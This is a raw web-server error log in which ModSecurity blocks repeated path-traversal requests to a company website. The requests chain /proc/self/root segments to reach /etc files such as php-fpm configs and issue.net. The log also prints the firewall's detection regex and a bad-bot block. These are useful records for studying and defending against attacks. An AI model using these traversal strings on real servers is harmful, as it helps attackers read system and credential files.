https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:07:38.739090 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:59982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuguv-YZRR_7pZ7nDJV8wAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:07:40.047036 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:37980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugvP-YZRR_7pZ7nDJV9QAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:07:41.334563 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:37996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugvRkFeYa1D6dYQnC1-AAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:07:43.124184 2026] [mime_magic:error] [pid 17887:tid 140411582465792] (70014)End of file found: [client 62.164.177.47:42224] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 04:07:43.646951 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:38012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugv-yqAr6etmhZHNossgAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:07:56.839125 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.241.31:38028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugzF_V7PWP6ixUYl6E0AAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:08:01.669805 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 57.141.18.13:58570] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 04:08:05.080855 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:41314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abug1P-YZRR_7pZ7nDJWCQAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:08:06.650933 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:41318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abug1vu8EFLIOrSqIptmeQAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:08:08.034394 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:35476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abug2Mdf6f5d65gmYZQ70gAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:08:14.060434 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:35490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abug3gbLMZ6AikZjR9UmZQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:08:49.966838 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:57490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhAfu8EFLIOrSqIptmpQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:09:20.653085 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.228.61:36298] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuhHxkFeYa1D6dYQnC2JQAAAcU"]
[Thu Mar 19 04:09:35.808280 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:49252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhL_u8EFLIOrSqIptm8AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:10:58.976068 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:39256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhgvu8EFLIOrSqIptnLAAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:11:05.751720 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:56596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhiQbLMZ6AikZjR9Um1AAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:07.190894 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:56606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhiwbLMZ6AikZjR9Um1QAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:13.632775 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.241.31:42668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhkV_V7PWP6ixUYl6FKgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:14.849291 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:42684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhkgkwaGbbGflqUZB9ngAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:16.158942 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.241.31:42696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhlP-YZRR_7pZ7nDJWYQAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:11:17.483325 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:35260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhlda6ubjKNq_cu4YJVQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:11:18.843644 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.241.31:35268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhll_V7PWP6ixUYl6FLAAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:11:20.214115 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.241.31:35276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhmBkFeYa1D6dYQnC2pAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:11:22.742914 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:35286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhmsdf6f5d65gmYZQ8UgAAAso"], referer: 